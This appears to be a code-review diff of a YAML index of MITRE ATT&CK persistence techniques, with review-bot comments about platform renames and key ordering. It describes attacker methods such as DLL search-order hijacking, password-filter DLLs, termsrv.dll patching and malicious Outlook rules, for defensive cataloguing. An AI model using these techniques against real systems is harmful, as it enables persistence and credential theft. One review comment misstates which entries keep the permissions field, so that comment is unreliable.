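Review bot: T1098.003's platform list collapses `Office 365`, `Google Workspace` and `Azure AD` into `Office Suite` and `Identity Provider`. Any index or filter built on the old platform names will silently match nothing for this technique, so update those alongside this change rather than in a follow-up.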
@@ -28923,9 +29300,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28993,19 +29367,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -29021,8 +29394,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29036,7 +29409,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -29062,6 +29435,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -29089,42 +29466,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -29139,13 +29485,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -29153,11 +29504,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -29188,7 +29562,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29226,13 +29600,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29258,7 +29630,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29300,7 +29672,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29378,11 +29749,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29462,35 +29832,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29514,71 +29859,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
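Review bot: T1556.002 drops `x_mitre_permissions_required` (Administrator, SYSTEM) at the `-` lines near the top of this hunk, and T1505.005 is rewritten wholesale even though no field is actually lost, only moved. Two points: first, the old T1137.005 and T1546.011 entries in this same file still carry `x_mitre_permissions_required`, so anything downstream that reads it must already tolerate the key being absent; please confirm. Second, the new output orders keys as the upstream object happens to, which turns a version bump from 2.0 to 2.1 into a seventy-line rewrite; emitting keys in a stable sorted order would keep future ATT&CK refreshes to a few-line diff and make changes like the dropped permissions field visible at a glance.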
@@ -29587,24 +29921,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -29696,8 +30062,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29728,71 +30094,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
